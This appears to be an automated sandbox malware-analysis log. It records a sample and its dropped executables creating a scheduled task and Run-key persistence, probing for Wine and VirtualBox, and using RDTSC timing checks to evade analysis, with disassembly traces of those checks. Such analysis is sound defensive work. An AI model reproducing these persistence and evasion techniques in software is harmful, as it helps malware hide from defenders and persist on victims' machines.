Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 100bc97ff1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 100bc97ff1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76bf5a4dba.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76bf5a4dba.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee3f3c2bda.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee3f3c2bda.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002600001\test.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002600001\test.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1002600001\test.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16ED34 second address: 16ED38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9CD3 second address: 2E9CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9CD7 second address: 2E9CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB6784C8BE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9CE7 second address: 2E9CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB678E7E6EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2E9FBF second address: 2E9FCB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007FB6784C8BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2EA140 second address: 2EA156 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jng 00007FB678E7E6E6h 0x0000000f jbe 00007FB678E7E6E6h 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED09E second address: 2ED0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED0A3 second address: 2ED0D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB678E7E6ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1E54h], edx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2E6Fh] 0x00000019 call 00007FB678E7E6E9h 0x0000001e push eax 0x0000001f push edx 0x00000020 jno 00007FB678E7E6ECh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED0D9 second address: 2ED0F4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB6784C8BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jbe 00007FB6784C8BD6h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED0F4 second address: 2ED0F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED0F9 second address: 2ED148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jbe 00007FB6784C8BEBh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FB6784C8BE8h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jno 00007FB6784C8BD6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED148 second address: 2ED1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB678E7E6E8h 0x0000000c popad 0x0000000d pop eax 0x0000000e clc 0x0000000f push 00000003h 0x00000011 sub dword ptr [ebp+122D397Ch], edi 0x00000017 jmp 00007FB678E7E6F7h 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D3C62h], ebx 0x00000024 push 00000003h 0x00000026 push edi 0x00000027 jmp 00007FB678E7E6F6h 0x0000002c pop ecx 0x0000002d push BA061F0Bh 0x00000032 pushad 0x00000033 jo 00007FB678E7E6ECh 0x00000039 jc 00007FB678E7E6E6h 0x0000003f jmp 00007FB678E7E6F2h 0x00000044 popad 0x00000045 add dword ptr [esp], 05F9E0F5h 0x0000004c mov dword ptr [ebp+122D397Ch], ecx 0x00000052 lea ebx, dword ptr [ebp+12451F44h] 0x00000058 xor dword ptr [ebp+122D397Ch], ebx 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED1DF second address: 2ED1E9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED260 second address: 2ED2CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB678E7E6F0h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FB678E7E6E8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D3AEAh], ebx 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 mov dh, al 0x00000038 pop esi 0x00000039 push 7FB5632Bh 0x0000003e pushad 0x0000003f jne 00007FB678E7E6FCh 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 pop eax 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED2CE second address: 2ED34E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 7FB563ABh 0x00000012 stc 0x00000013 push 00000003h 0x00000015 call 00007FB6784C8BDAh 0x0000001a jmp 00007FB6784C8BDBh 0x0000001f pop ecx 0x00000020 push 00000000h 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D3950h], eax 0x0000002a push 524580C8h 0x0000002f pushad 0x00000030 jmp 00007FB6784C8BDDh 0x00000035 push eax 0x00000036 jmp 00007FB6784C8BDFh 0x0000003b pop eax 0x0000003c popad 0x0000003d add dword ptr [esp], 6DBA7F38h 0x00000044 sub dword ptr [ebp+122D2C00h], edi 0x0000004a lea ebx, dword ptr [ebp+12451F4Dh] 0x00000050 jno 00007FB6784C8BD8h 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 jbe 00007FB6784C8BD8h 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED34E second address: 2ED354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED354 second address: 2ED358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED358 second address: 2ED36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FB678E7E6E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED3BA second address: 2ED3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED3BE second address: 2ED3DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FB678E7E6E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED3DA second address: 2ED3FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB6784C8BE7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED3FB second address: 2ED440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx esi, dx 0x0000000d push 00000000h 0x0000000f call 00007FB678E7E6E9h 0x00000014 jns 00007FB678E7E6FAh 0x0000001a jmp 00007FB678E7E6F4h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jnc 00007FB678E7E6E8h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED440 second address: 2ED446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED446 second address: 2ED494 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnp 00007FB678E7E6F4h 0x00000016 mov eax, dword ptr [eax] 0x00000018 jmp 00007FB678E7E6EEh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB678E7E6F4h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2ED494 second address: 2ED49A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2DF95F second address: 2DF965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30C4AF second address: 30C4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30C8E3 second address: 30C8ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30CB9D second address: 30CBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30CD4C second address: 30CD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30036E second address: 300384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jp 00007FB6784C8BD6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30D06C second address: 30D077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30D077 second address: 30D07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30D07B second address: 30D098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB678E7E6F9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 30D970 second address: 30D974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3141AD second address: 3141D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB678E7E6F9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3141D1 second address: 3141DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB6784C8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3141DB second address: 3141F4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FB678E7E6E6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 318532 second address: 31853A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2CED47 second address: 2CED51 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB678E7E6E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 317B0E second address: 317B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 317DD4 second address: 317DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB678E7E6E6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FB678E7E6F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 317DF5 second address: 317DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319F9D second address: 319FA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319FA7 second address: 319FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 319FAB second address: 319FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A01D second address: 31A03A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB6784C8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB6784C8BE1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31A03A second address: 31A062 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB678E7E6E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jne 00007FB678E7E6E8h 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007FB678E7E6ECh 0x00000020 rdtsc
